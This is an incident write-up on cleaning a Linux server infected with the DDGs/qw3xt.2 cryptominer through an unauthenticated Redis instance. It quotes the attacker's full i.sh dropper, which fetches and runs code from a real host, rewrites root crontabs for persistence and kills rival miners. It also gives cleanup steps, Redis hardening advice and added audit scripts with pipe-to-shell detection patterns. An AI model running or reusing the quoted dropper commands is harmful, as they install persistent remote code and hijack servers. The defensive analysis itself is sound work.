Linux server implanted with the DDGs / qw3xt.2 mining virus: processing record

Source: Internet
Author: User


Symptoms after the intrusion:

Two abnormal processes, qw3xt.2 and DDGs, were found consuming a lot of CPU; after being killed they reappeared a short while later.

After killing the two abnormal processes, the following process was seen again after some time:

The scheduled task was not found in /etc/sysconfig/crontab at first; it was then found in the output of crontab -e:

*/5 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh
Looking up 149.56.106.215 shows it is located in the United States. The content of the i.sh script is as follows:

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
echo "" > /var/spool/cron/root
echo "*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/root
echo "*/15 * * * * wget -q -O- http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/crontabs/root
echo "*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/crontabs/root
echo "*/15 * * * * wget -q -O- http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/crontabs/root
ps auxf | grep -v grep | grep /tmp/ddgs.3013 || rm -rf /tmp/ddgs.3013
if [ ! -f "/tmp/ddgs.3013" ]; then
    wget -q http://149.56.106.215:8000/static/3013/ddgs.$(uname -m) -O /tmp/ddgs.3013
    curl -fsSL http://149.56.106.215:8000/static/3013/ddgs.$(uname -m) -o /tmp/ddgs.3013
fi
chmod +x /tmp/ddgs.3013 && /tmp/ddgs.3013
ps auxf | grep -v grep | grep Circle_mi | awk '{print $}' | xargs kill
ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $}' | xargs kill
ps auxf | grep -v grep | grep hashvault.pro | awk '{print $}' | xargs kill
ps auxf | grep -v grep | grep nanopool.org | awk '{print $}' | xargs kill
ps auxf | grep -v grep | grep minexmr.com | awk '{print $}' | xargs kill
ps auxf | grep -v grep | grep /boot/efi/ | awk '{print $}' | xargs kill
#ps auxf | grep -v grep | grep ddg.2006 | awk '{print $}' | kill
#ps auxf | grep -v grep | grep ddg.2010 | awk '{print $}' | kill

In short, the script rewrites root's crontab in both spool locations so that it is re-downloaded and re-run every 15 minutes, fetches the ddgs.3013 binary for the machine's architecture into /tmp if it is not already running, and kills competing miners (Circle_mi, hashvault.pro, nanopool.org, minexmr.com and others) so that it has the CPU to itself.

Processing method:

1. Delete the entry from crontab -e:

*/5 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh

2. Remove the password-less login key the attacker added to /root/.ssh/authorized_keys

3. Change the Redis password

4. Change the passwords of root and of the login accounts
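The following audit script is an added example and is not part of the original record. It covers the i.sh persistence shown above and cleanup steps 1 and 2: it looks for cron entries that pipe curl/wget output into a shell (the pattern i.sh writes into /var/spool/cron/root and /var/spool/cron/crontabs/root), for the download host quoted in this post, and lists every key that grants password-less login in an authorized_keys file. The sample cron and authorized_keys files are constructed inline so it runs offline; audit_host applies the same checks to the real paths.

```shell
#!/bin/sh
# Added example, not part of the original post: a defender-side audit for the
# persistence described above. Sample files below are constructed so the
# script runs offline; CRON_LOCATIONS are the paths the i.sh dropper writes
# to plus the usual system crontab.

# Download-and-pipe-to-shell pattern: curl/wget ... | sh (or bash).
PIPE_TO_SH_RE='(curl|wget)[^|]*\|[[:space:]]*(sh|bash)([[:space:]]|$)'
# Download host quoted in the post (indicator for this specific campaign).
C2_HOST_RE='149\.56\.106\.215'

# Print numbered suspicious lines from one cron file.
# Exit status 0 if at least one line matched, 1 otherwise (grep semantics).
scan_cron_file() {
    grep -nE "$PIPE_TO_SH_RE|$C2_HOST_RE" "$1"
}

# Sum of suspicious lines over all given files; missing files are skipped.
count_cron_hits() {
    total=0
    for f in "$@"; do
        [ -f "$f" ] || continue
        hits=$(grep -cE "$PIPE_TO_SH_RE|$C2_HOST_RE" "$f" || true)
        total=$((total + hits))
    done
    echo "$total"
}

# Print one "type comment" line per key in an authorized_keys file, so every
# key granting password-less login can be reviewed (cleanup step 2).
# Simplified: keys carrying an options prefix would shift the fields.
list_authorized_keys() {
    awk '!/^[[:space:]]*(#|$)/ { c = ($3 == "") ? "(no comment)" : $3; print $1, c }' "$1"
}

CRON_LOCATIONS="/var/spool/cron/root /var/spool/cron/crontabs/root /etc/crontab"

# Audit the live host: the cron files the dropper touches plus /etc/cron.d.
audit_host() {
    for f in $CRON_LOCATIONS /etc/cron.d/*; do
        [ -f "$f" ] || continue
        scan_cron_file "$f" | sed "s|^|$f:|"
    done
    if [ -f /root/.ssh/authorized_keys ]; then
        list_authorized_keys /root/.ssh/authorized_keys
    fi
    return 0
}

# --- constructed demo data (not taken from a real host) ---
demo=$(mktemp -d)
printf '%s\n' \
    '0 3 * * * /usr/bin/logrotate /etc/logrotate.conf' \
    '*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh' \
    '*/15 * * * * wget -q -O- http://149.56.106.215:8000/i.sh | sh' \
    > "$demo/root"
printf '%s\n' \
    'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIExampleKeyDataForDemoOnly admin@workstation' \
    'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDExampleKeyDataForDemoOnly' \
    > "$demo/authorized_keys"

echo "suspicious cron lines: $(count_cron_hits "$demo/root")"   # 2
scan_cron_file "$demo/root"
echo "keys granting password-less login:"
list_authorized_keys "$demo/authorized_keys"
rm -rf "$demo"
```

Run audit_host as root on the affected machine after the cleanup; an empty result from the cron scan and only keys you recognise in the authorized_keys listing confirm that steps 1 and 2 took effect. Because i.sh re-creates the crontab every 15 minutes while the dropper is still running, the scan should be repeated once the miner processes have been stopped.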

Security recommendations:

1. Configure the bind option to limit which IPs may connect to the Redis server, change the default port 6379, and configure authentication (requirepass) to set a password. Note that the password is stored in clear text in the Redis configuration file.

2. Use the rename-command directive to rename the CONFIG command (for example to rename_config), so that even with unauthorized access it is harder for an attacker to use CONFIG.

3. If possible, block access to Redis from the external network in the firewall.

Intrusion method:

From the information collected, the intrusion was caused by the Redis unauthorized-access weakness: no password was set, or the password was too simple. The specific technique is described at

http://blog.knownsec.com/2015/11/analysis-of-redis-unauthorized-of-expolit/

The Redis password is changed as follows (at the redis-cli prompt):

127.0.0.1:6379> config get requirepass    # gets the currently set password
127.0.0.1:6379> config set requirepass "yourpassword"    # sets the current password; after the service restarts it reverts to the default, i.e. no password

For a permanent change, open the Redis configuration file redis.conf, find the requirepass entry and change the password as follows:

requirepass yourpassword    # note: there must be no spaces before the line
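The configuration audit below is an added example, not part of the original record. It checks a redis.conf against the recommendations above (bind restriction, non-default port, requirepass, rename-command for CONFIG) and against the requirepass note just given: only active directives count, so a commented-out "# requirepass" line is treated exactly as Redis treats it, as no password at all. The weak and hardened configuration files are constructed samples; the 16-character minimum for requirepass and the placeholder values in the hardened file are assumptions of this example, not settings from the post.

```shell
#!/bin/sh
# Added example, not part of the original post: audit a redis.conf against the
# hardening points above. Both configuration files below are constructed
# samples; the "hardened" values are placeholders to be replaced.

# Print one line per unmet recommendation; print nothing when all are met.
# Only active directives count: a commented "# requirepass ..." line is
# ignored, exactly as Redis ignores it.
audit_redis_conf() {
    active=$(grep -vE '^[[:space:]]*#' "$1" || true)

    # bind: absent means listen on every interface; 0.0.0.0 or * is the same.
    if ! printf '%s\n' "$active" | grep -qE '^bind[[:space:]]'; then
        echo "bind: not set, Redis listens on all interfaces"
    elif printf '%s\n' "$active" | grep -qE '^bind[[:space:]].*(0\.0\.0\.0|\*)'; then
        echo "bind: wildcard address, restrict to specific IPs"
    fi

    # port: a missing directive means the default 6379.
    port=$(printf '%s\n' "$active" | awk '$1 == "port" { print $2; exit }')
    if [ "${port:-6379}" = "6379" ]; then
        echo "port: default 6379 in use"
    fi

    # requirepass: absent means no authentication; a short one invites guessing
    # (16 characters is this example's threshold, an assumption).
    pw=$(printf '%s\n' "$active" | awk '$1 == "requirepass" { print $2; exit }')
    if [ -z "$pw" ]; then
        echo "requirepass: not set, unauthenticated access allowed"
    elif [ "${#pw}" -lt 16 ]; then
        echo "requirepass: shorter than 16 characters"
    fi

    # rename-command CONFIG: makes the CONFIG command harder to reach.
    if ! printf '%s\n' "$active" | grep -qE '^rename-command[[:space:]]+CONFIG[[:space:]]'; then
        echo "rename-command: CONFIG not renamed"
    fi
}

# Number of findings for a file (0 means every recommendation is met).
count_findings() {
    audit_redis_conf "$1" | wc -l | tr -d ' '
}

# --- constructed samples ---
demo=$(mktemp -d)
cat > "$demo/weak.conf" <<'EOF'
# Defaults of an older redis.conf left untouched (constructed sample)
# bind 127.0.0.1
port 6379
# requirepass foobared
EOF
cat > "$demo/hardened.conf" <<'EOF'
# Hardened per the recommendations above (constructed sample, placeholders)
bind 127.0.0.1 10.0.0.5
port 16379
requirepass REPLACE-WITH-LONG-RANDOM-SECRET
rename-command CONFIG REPLACE-WITH-RANDOM-NAME
EOF

echo "weak.conf findings ($(count_findings "$demo/weak.conf")):"      # 4
audit_redis_conf "$demo/weak.conf"
echo "hardened.conf findings: $(count_findings "$demo/hardened.conf")"   # 0
rm -rf "$demo"
```

Because requirepass is stored in clear text in redis.conf, the file itself should be readable only by the Redis service account, and a change made with "config set requirepass" at the prompt should always be mirrored into the file, otherwise the next restart silently returns the server to the no-password state that caused this intrusion.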
